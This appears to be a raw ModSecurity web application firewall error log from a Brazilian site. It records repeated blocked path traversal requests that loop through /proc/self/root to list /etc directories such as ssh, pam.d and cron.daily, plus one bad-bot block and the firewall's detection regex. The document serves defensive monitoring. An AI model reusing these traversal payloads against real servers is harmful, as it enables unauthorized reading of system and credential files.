[Mon Mar 16 16:34:30.164425 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:42668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbRv9ocpUE4ed4uDwErAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:31.306030 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:42682] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbR7ABkC4fWIHEf8EFqAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:32.591652 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:42692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbSI6lpbStxTqkSkt9NwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:35.144020 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:42708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbSUr9dMAiw-8KANNY4wAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:36.442521 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:42722] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbTLABkC4fWIHEf8EFqgAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:37.628223 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:42732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbTc_BxrYCr4hPDw_9JwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:38.903515 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:37320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbTqTCbgAP5jq5Teg-mwAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:40.076208 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:37328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbUM_BxrYCr4hPDw_9KAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:41.348140 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:37338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbUaQpVkWug9HeOt9IRAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:42.025809 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.244.31:49318] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhbUrysWC90G-1nBrBWKAAAAYE"]
[Mon Mar 16 16:34:43.588943 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:37352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbU7ABkC4fWIHEf8EFrgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:44.925436 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:37356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbVKQpVkWug9HeOt9IRgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:48.230829 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:37360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbWM_BxrYCr4hPDw_9LAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:49.528352 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:38532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbWdSswJuvopo3lOhxigAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:50.730401 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:38536] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbWo6lpbStxTqkSkt9PQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:52.015918 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:38546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbXP9ocpUE4ed4uDwEtAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:53.211102 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:38558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbXdSswJuvopo3lOhxjAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:54.548197 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:38564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbXrABkC4fWIHEf8EFtQAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:55.716691 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:38566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbX_9ocpUE4ed4uDwEtgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:58.092450 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:38576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbYf9ocpUE4ed4uDwEuAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:59.478606 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:55718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbY8_BxrYCr4hPDw_9MQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:04.396528 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:55734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbaLysWC90G-1nBrBWMQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
